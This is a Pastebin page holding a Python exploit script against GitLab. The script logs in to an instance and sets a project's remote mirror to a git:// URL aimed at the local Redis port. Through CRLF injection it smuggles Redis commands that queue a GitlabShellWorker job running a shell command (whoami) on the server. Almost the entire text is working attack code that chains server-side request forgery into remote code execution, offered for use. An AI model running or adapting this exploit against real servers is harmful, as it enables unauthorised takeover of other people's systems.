Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- import requests
- import sys
- from bs4 import BeautifulSoup
- from urllib.parse import urljoin
- import random
- import logging
- import time
- s = requests.Session()
- def get_csrf_token(html):
- soup = BeautifulSoup(html)
- auth_token = soup.find("input", {"name": "authenticity_token"})
- return auth_token["value"]
- def login(username, password):
- response = s.get(urljoin(target, '/users/sign_in'))
- token = get_csrf_token(response.text)
- data = {
- 'user[login]': username,
- 'user[password]': password,
- 'authenticity_token': token
- }
- response = s.post(urljoin(target, '/users/sign_in'), data=data)
- assert(response.status_code == 200)
- def execute_payload(username, project, payload):
- namespace = username
- response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository'])))
- token = get_csrf_token(response.text)
- url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n'
- data = {
- '_method': 'patch',
- 'project[remote_mirrors_attributes][0][enabled]': '1',
- 'project[remote_mirrors_attributes][0][only_protected_branches]': 'true',
- 'project[remote_mirrors_attributes][0][uri]': url,
- 'uri': url,
- 'authenticity_token': token,
- 'auth_metod': '',
- 'password': ''
- }
- response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data)
- data = {
- '_method': 'post',
- 'authenticity_token': token
- }
- response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data)
- if __name__ == '__main__':
- if len(sys.argv) != 5:
- print("python3 exploit.py target username password projectname")
- sys.exit(1)
- target = sys.argv[1]
- username = sys.argv[2]
- password = sys.argv[3]
- projectname = sys.argv[4]
- jid = ''.join(random.choice('0123456789abcdeg') for n in range(24))
- payload = """
- multi
- sadd resque:gitlab:queues system_hook_push
- lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
- exec
- exec
- """ % jid
- login(username, password)
- execute_payload(username, projectname, payload)
Add Comment
Please, Sign In to add comment